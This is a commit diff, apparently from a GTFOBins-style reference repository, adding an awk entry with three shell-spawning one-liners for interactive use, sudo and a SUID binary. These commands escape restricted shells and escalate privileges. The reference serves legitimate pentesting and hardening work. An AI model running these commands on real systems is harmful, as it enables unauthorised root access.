First commit
This commit is contained in:
9
_gtfobins/awk.md
Normal file
9
_gtfobins/awk.md
Normal file
@@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
---
|
||||
Reference in New Issue
Block a user